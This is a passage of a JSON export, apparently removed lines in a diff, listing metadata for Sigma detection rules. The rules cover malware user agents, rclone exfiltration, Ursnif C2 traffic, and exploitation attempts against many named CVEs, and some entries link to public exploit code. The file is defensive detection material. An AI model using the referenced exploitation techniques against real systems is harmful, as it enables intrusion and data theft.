"level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious user agent strings used by malware in proxy logs", - "uuid": "5c84856b-55a5-45f1-826f-13f37250cf4e", - "value": "Malware User Agent", - "meta": { - "refs": [ - "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", - "http://www.botopedia.org/search?searchword=scan&searchphrase=all", - "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", - "https://perishablepress.com/blacklist/ua-2013.txt", - "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_malware.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2017/07/08", - "filename": "proxy_ua_malware.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string", - "uuid": "2c03648b-e081-41a5-b9fb-7d854a915091", - "value": "Rclone Activity via Proxy", - "meta": { - "refs": [ - "https://rclone.org/", - "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_rclone.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ], - "creation_date": "2022/10/18", - "filename": "proxy_ua_rclone.yml", - "author": "Janantha Marasinghe", - "level": "medium", - "falsepositive": [ - "Valid requests with this exact user agent to that is used by legitimate scripts or sysadmin operations" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious malformed user agent strings in proxy logs", - "uuid": "7195a772-4b3f-43a4-a210-6a003d65caa1", - "value": "Suspicious User Agent", - "meta": { - "refs": [ - "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2017/07/08", - "filename": "proxy_ua_susp.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious User Agent strings that end with an equal sign, which can be a sign of base64 encoded values used as User Agent string", - "uuid": "894a8613-cf12-48b3-8e57-9085f54aa0c3", - "value": "Suspicious Base64 User Agent", - "meta": { - "refs": [ - "https://blogs.jpcert.or.jp/en/2022/07/yamabot.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp_base64.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2022/07/08", - "filename": "proxy_ua_susp_base64.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Ursnif C2 traffic.", - "uuid": "932ac737-33ca-4afd-9869-0d48b391fcc9", - "value": "Ursnif Malware C2 URL Pattern", - "meta": { - "refs": [ - "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_c2_url.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1204.002", - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2019/12/19", - "filename": "proxy_ursnif_malware_c2_url.yml", - "author": "Thomas Patzke", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects download of Ursnif malware done by dropper documents.", - "uuid": "a36ce77e-30db-4ea0-8795-644d7af5dfb4", - "value": "Ursnif Malware Download URL Pattern", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_download_url.yml" - ], - "tags": "No established tags", - "creation_date": "2019/12/19", - "filename": "proxy_ursnif_malware_download_url.yml", - "author": "Thomas Patzke", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects a segmentation fault error message caused by a creashing apache worker process", - "uuid": "1da8ce0b-855d-4004-8860-7d64d42063b1", - "value": "Apache Segmentation Fault", - "meta": { - "refs": [ - "http://www.securityfocus.com/infocus/1633", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_segfault.yml" - ], - "tags": [ - "attack.impact", - "attack.t1499.004" - ], - "creation_date": "2017/02/28", - "filename": "web_apache_segfault.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "No established product" - } - }, - { - "description": "Detects an issue in apache logs that reports threading related errors", - "uuid": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", - "value": "Apache Threading Error", - "meta": { - "refs": [ - "https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_threading_error.yml" - ], - "tags": "No established tags", - "creation_date": "2019/01/22", - "filename": "web_apache_threading_error.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185" - ], - "logsource.category": "No established category", - "logsource.product": "No established product" - } - }, - { - "description": "MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier,\nwhen magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.\n", - "uuid": "a4a899e8-fd7a-49dd-b5a8-7044def72d61", - "value": "CVE-2010-5278 Exploitation Attempt", - "meta": { - "refs": [ - "https://github.com/projectdiscovery/nuclei-templates", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2010_5278_exploitation_attempt.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/08/25", - "filename": "web_cve_2010_5278_exploitation_attempt.yml", - "author": "Subhash Popuri (@pbssubhash)", - "level": "critical", - "falsepositive": [ - "Scanning from Nuclei", - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287", - "uuid": "a133193c-2daa-4a29-8022-018695fcf0ae", - "value": "Rejetto HTTP File Server RCE", - "meta": { - "refs": [ - "https://vk9-sec.com/hfs-code-execution-cve-2014-6287/", - "https://www.exploit-db.com/exploits/39161", - "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2014_6287_hfs_rce.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.t1505.003", - "cve.2014.6287" - ], - "creation_date": "2022/07/19", - "filename": "web_cve_2014_6287_hfs_rce.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs", - "uuid": "a2e97350-4285-43f2-a63f-d0daff291738", - "value": "Fortinet CVE-2018-13379 Exploitation", - "meta": { - "refs": [ - "https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_13379_fortinet_preauth_read_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2020/12/08", - "filename": "web_cve_2018_13379_fortinet_preauth_read_exploit.yml", - "author": "Bhabesh Raj", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects access to a webshell dropped into a keystore folder on the WebLogic server", - "uuid": "37e8369b-43bb-4bf8-83b6-6dd43bda2000", - "value": "Oracle WebLogic Exploit", - "meta": { - "refs": [ - "https://twitter.com/pyn3rd/status/1020620932967223296", - "https://github.com/LandGrey/CVE-2018-2894", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_2894_weblogic_exploit.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.t1505.003", - "cve.2018.2894" - ], - "creation_date": "2018/07/22", - "filename": "web_cve_2018_2894_weblogic_exploit.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole", - "uuid": "2dbc10d7-a797-49a8-8776-49efa6442e60", - "value": "Pulse Secure Attack CVE-2019-11510", - "meta": { - "refs": [ - "https://www.exploit-db.com/exploits/47297", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_11510_pulsesecure_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2019/11/18", - "filename": "web_cve_2019_11510_pulsesecure_exploit.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack", - "uuid": "ac5a6409-8c89-44c2-8d64-668c29a2d756", - "value": "Citrix Netscaler Attack CVE-2019-19781", - "meta": { - "refs": [ - "https://support.citrix.com/article/CTX267679", - "https://support.citrix.com/article/CTX267027", - "https://isc.sans.edu/diary/25686", - "https://twitter.com/mpgn_x64/status/1216787131210829826", - "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_19781_citrix_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2020/01/02", - "filename": "web_cve_2019_19781_citrix_exploit.yml", - "author": "Arnim Rupp, Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398", - "uuid": "e9bc39ae-978a-4e49-91ab-5bd481fc668b", - "value": "Confluence Exploitation CVE-2019-3398", - "meta": { - "refs": [ - "https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_3398_confluence.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2020/05/26", - "filename": "web_cve_2019_3398_confluence.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects CVE-2020-0688 Exploitation attempts", - "uuid": "7c64e577-d72e-4c3d-9d75-8de6d1f9146a", - "value": "CVE-2020-0688 Exploitation Attempt", - "meta": { - "refs": [ - "https://github.com/Ridter/cve-2020-0688", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_exchange_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2020/02/27", - "filename": "web_cve_2020_0688_exchange_exploit.yml", - "author": "NVISO", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", - "uuid": "fce2c2e2-0fb5-41ab-a14c-5391e1fd70a5", - "value": "CVE-2020-0688 Exchange Exploitation via Web Log", - "meta": { - "refs": [ - "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_msexchange.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2020/02/29", - "filename": "web_cve_2020_0688_msexchange.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts", - "uuid": "5a35116f-43bc-4901-b62d-ef131f42a9af", - "value": "CVE-2020-10148 SolarWinds Orion API Auth Bypass", - "meta": { - "refs": [ - "https://kb.cert.org/vuls/id/843464", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_10148_solarwinds_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2020/12/27", - "filename": "web_cve_2020_10148_solarwinds_exploit.yml", - "author": "Bhabesh Raj, Tim Shelton", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects exploitation attempts on WebLogic servers", - "uuid": "85d466b0-d74c-4514-84d3-2bdd3327588b", - "value": "Oracle WebLogic Exploit CVE-2020-14882", - "meta": { - "refs": [ - "https://isc.sans.edu/diary/26734", - "https://twitter.com/jas502n/status/1321416053050667009?s=20", - "https://twitter.com/sudo_sudoka/status/1323951871078223874", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_14882_weblogic_exploit.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "cve.2020.14882" - ], - "creation_date": "2020/11/02", - "filename": "web_cve_2020_14882_weblogic_exploit.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188", - "uuid": "15c312b9-00d0-4feb-8870-7d940a4bdc5e", - "value": "TerraMaster TOS CVE-2020-28188", - "meta": { - "refs": [ - "https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/", - "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_28188_terramaster_rce_exploit.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "cve.2020.28188" - ], - "creation_date": "2021/01/25", - "filename": "web_cve_2020_28188_terramaster_rce_exploit.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)", - "uuid": "aba47adc-4847-4970-95c1-61dce62a8b29", - "value": "Cisco ASA FTD Exploit CVE-2020-3452", - "meta": { - "refs": [ - "https://twitter.com/aboul3la/status/1286012324722155525", - "https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "cve.2020.3452" - ], - "creation_date": "2021/01/07", - "filename": "web_cve_2020_3452_cisco_asa_ftd.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902", - "uuid": "44b53b1c-e60f-4a7b-948e-3435a7918478", - "value": "CVE-2020-5902 F5 BIG-IP Exploitation Attempt", - "meta": { - "refs": [ - "https://support.f5.com/csp/article/K52145254", - "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/", - "https://twitter.com/yorickkoster/status/1279709009151434754", - "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_5902_f5_bigip.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2020/07/05", - "filename": "web_cve_2020_5902_f5_bigip.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195", - "uuid": "0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7", - "value": "Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195", - "meta": { - "refs": [ - "https://support.citrix.com/article/CTX276688", - "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/", - "https://dmaasland.github.io/posts/citrix.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_8193_8195_citrix_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2020/07/10", - "filename": "web_cve_2020_8193_8195_citrix_exploit.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.", - "uuid": "f0500377-bc70-425d-ac8c-e956cd906871", - "value": "Arcadyan Router Exploitations", - "meta": { - "refs": [ - "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2", - "https://www.tenable.com/security/research/tra-2021-13", - "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2021.20090", - "cve.2021.20091" - ], - "creation_date": "2021/08/24", - "filename": "web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml", - "author": "Bhabesh Raj", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109", - "uuid": "687f6504-7f44-4549-91fc-f07bab065821", - "value": "Oracle WebLogic Exploit CVE-2021-2109", - "meta": { - "refs": [ - "https://twitter.com/pyn3rd/status/1351696768065409026", - "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "cve.2021.2109" - ], - "creation_date": "2021/01/20", - "filename": "web_cve_2021_2109_weblogic_rce_exploit.yml", - "author": "Bhabesh Raj", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972", - "uuid": "179ed852-0f9b-4009-93a7-68475910fd86", - "value": "CVE-2021-21972 VSphere Exploitation", - "meta": { - "refs": [ - "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", - "https://f5.pm/go-59627.html", - "https://swarm.ptsecurity.com/unauth-rce-vmware", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/02/24", - "filename": "web_cve_2021_21972_vsphere_unauth_rce_exploit.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "OVA uploads to your VSphere appliance" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978", - "uuid": "77586a7f-7ea4-4c41-b19c-820140b84ca9", - "value": "CVE-2021-21978 Exploitation Attempt", - "meta": { - "refs": [ - "https://twitter.com/wugeej/status/1369476795255320580", - "https://paper.seebug.org/1495/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2021.21978" - ], - "creation_date": "2020/03/10", - "filename": "web_cve_2021_21978_vmware_view_planner_exploit.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.", - "uuid": "b014ea07-8ea0-4859-b517-50a4e5b7ecec", - "value": "VMware vCenter Server File Upload CVE-2021-22005", - "meta": { - "refs": [ - "https://kb.vmware.com/s/article/85717", - "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22005_vmware_file_upload.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/09/24", - "filename": "web_cve_2021_22005_vmware_file_upload.yml", - "author": "Sittikorn S", - "level": "high", - "falsepositive": [ - "Vulnerability Scanning" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs", - "uuid": "f425637f-891c-4191-a6c4-3bb1b70513b4", - "value": "Fortinet CVE-2021-22123 Exploitation", - "meta": { - "refs": [ - "https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22123_fortinet_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/08/19", - "filename": "web_cve_2021_22123_fortinet_exploit.yml", - "author": "Bhabesh Raj, Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)", - "uuid": "5525edac-f599-4bfd-b926-3fa69860e766", - "value": "Pulse Connect Secure RCE Attack CVE-2021-22893", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/06/29", - "filename": "web_cve_2021_22893_pulse_secure_rce_exploit.yml", - "author": "Sittikorn S", - "level": "high", - "falsepositive": [ - "Vulnerability Scanning" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814", - "uuid": "b9888738-29ed-4c54-96a4-f38c57b84bb3", - "value": "Exploitation of CVE-2021-26814 in Wazuh", - "meta": { - "refs": [ - "https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26814_wzuh_rce.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2021.21978", - "cve.2021.26814" - ], - "creation_date": "2021/05/22", - "filename": "web_cve_2021_26814_wzuh_rce.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories", - "uuid": "effee1f6-a932-4297-a81f-acb44064fa3a", - "value": "ProxyLogon Reset Virtual Directories Based On IIS Log", - "meta": { - "refs": [ - "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26858_iis_rce.yml" - ], - "tags": "No established tags", - "creation_date": "2021/08/10", - "filename": "web_cve_2021_26858_iis_rce.yml", - "author": "frack113", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "webserver", - "logsource.product": "windows" - } - }, - { - "description": "Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480", - "uuid": "a2a9d722-0acb-4096-bccc-daaf91a5037b", - "value": "Exchange Exploitation CVE-2021-28480", - "meta": { - "refs": [ - "https://twitter.com/GossiTheDog/status/1392965209132871683?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_28480_exchange_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/05/14", - "filename": "web_cve_2021_28480_exchange_exploit.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766", - "uuid": "56973b50-3382-4b56-bdf5-f51a3183797a", - "value": "CVE-2021-33766 Exchange ProxyToken Exploitation", - "meta": { - "refs": [ - "https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/08/30", - "filename": "web_cve_2021_33766_msexchange_proxytoken.yml", - "author": "Florian Roth, Max Altgelt, Christian Burkard", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539", - "uuid": "6702b13c-e421-44cc-ab33-42cc25570f11", - "value": "ADSelfService Exploitation", - "meta": { - "refs": [ - "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_adselfservice.yml" - ], - "tags": "No established tags", - "creation_date": "2021/09/20", - "filename": "web_cve_2021_40539_adselfservice.yml", - "author": "Tobias Michalski, Max Altgelt", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).", - "uuid": "fcbb4a77-f368-4945-b046-4499a1da69d1", - "value": "CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit", - "meta": { - "refs": [ - "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/", - "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", - "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2021/09/10", - "filename": "web_cve_2021_40539_manageengine_adselfservice_exploit.yml", - "author": "Sittikorn S, Nuttakorn Tungpoonsup", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49.\nAn attacker could use a path traversal attack to map URLs to files outside the expected document root.\nIf files outside of the document root are not protected by \"require all denied\" these requests can succeed.\nAdditionally this flaw could leak the source of interpreted files like CGI scripts.\nThis issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.\n", - "uuid": "3007fec6-e761-4319-91af-e32e20ac43f5", - "value": "CVE-2021-41773 Exploitation Attempt", - "meta": { - "refs": [ - "https://nvd.nist.gov/vuln/detail/CVE-2021-41773", - "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782", - "https://twitter.com/ptswarm/status/1445376079548624899", - "https://twitter.com/h4x0r_dz/status/1445401960371429381", - "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml", - "https://twitter.com/bl4sty/status/1445462677824761878", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_41773_apache_path_traversal.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/10/05", - "filename": "web_cve_2021_41773_apache_path_traversal.yml", - "author": "daffainfo, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx", - "uuid": 